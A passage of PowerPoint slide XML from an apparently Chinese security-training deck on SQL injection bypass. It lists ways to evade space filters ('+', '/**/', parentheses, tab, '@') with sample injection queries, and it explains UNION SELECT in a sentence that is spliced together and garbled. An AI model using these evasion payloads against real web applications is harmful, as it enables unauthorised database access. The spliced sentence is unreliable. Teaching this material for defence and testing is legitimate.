            <a:off x="4133956" y="2281840"/>
            <a:ext cx="6623742" cy="2625438"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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4000" b="1" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0704B6F-3385-4EC7-86DC-67C9A71CE192}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1918039" y="1727842"/>
            <a:ext cx="1355475" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>06.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="475574"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="椭圆 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4161C916-944D-4763-8B84-9D12DFF581A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10513692" y="1714500"/>
            <a:ext cx="787540" cy="787540"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="20000">
                <a:srgbClr val="475574">
                  <a:alpha val="76000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="77000">
                <a:srgbClr val="F2D4AA">
                  <a:alpha val="66000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gra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pc="600">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="椭圆 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B017DFD5-6ED9-4471-ABB5-07DB969177C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3665420" y="5227057"/>
            <a:ext cx="343873" cy="343873"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="20000">
                <a:srgbClr val="475574">
                  <a:alpha val="76000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="77000">
                <a:srgbClr val="F2D4AA">
                  <a:alpha val="66000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gra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pc="600">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAF4E3DC-0036-4E55-8BCA-1B5E78FA2CE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4947448" y="3288454"/>
            <a:ext cx="4436249" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>bypass</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="475574"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2023423750"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534647" y="424690"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602450" y="549215"/>
            <a:ext cx="5304026" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>bypass</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94F1723A-510B-4CB3-A962-16151C726573}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767474" y="1258515"/>
            <a:ext cx="11155237" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>代替空格</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的多种方式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36ADB706-6F9B-44AB-8671-E3DE3FC11323}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="932521" y="4581010"/>
            <a:ext cx="5094810" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>④ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\t  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(Tab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>键</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E5B7420-C52C-44C1-8959-0359BC6EED6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="872459" y="1814852"/>
            <a:ext cx="7903722" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>① </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>select+pass+from+user+where+id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>=1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA345CBB-2C02-4CED-AD2F-82A31A6C30AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="872459" y="2314563"/>
            <a:ext cx="11050252" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>② </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/**/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/*xxx*/         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>select/**/pass/**/from/**/user/**/where/**/id=1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01619802-D012-4CCF-97E2-48B811D71BCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="932521" y="5080642"/>
            <a:ext cx="7903723" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>⑤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> (select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>之后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>)     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>select@1,2,3     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  select 2,3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{989EC500-CA12-4D77-9B2A-4744447FC6FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900230" y="2846304"/>
            <a:ext cx="1594395" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>③ 括号</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBCF261C-8808-4098-A490-121D2F93CB20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1221845" y="3301305"/>
            <a:ext cx="9755699" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>括号是用来包围子查询的。因此</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>任何可以计算出结果的语句，都可以用括号包围起来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>。而括号的两端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
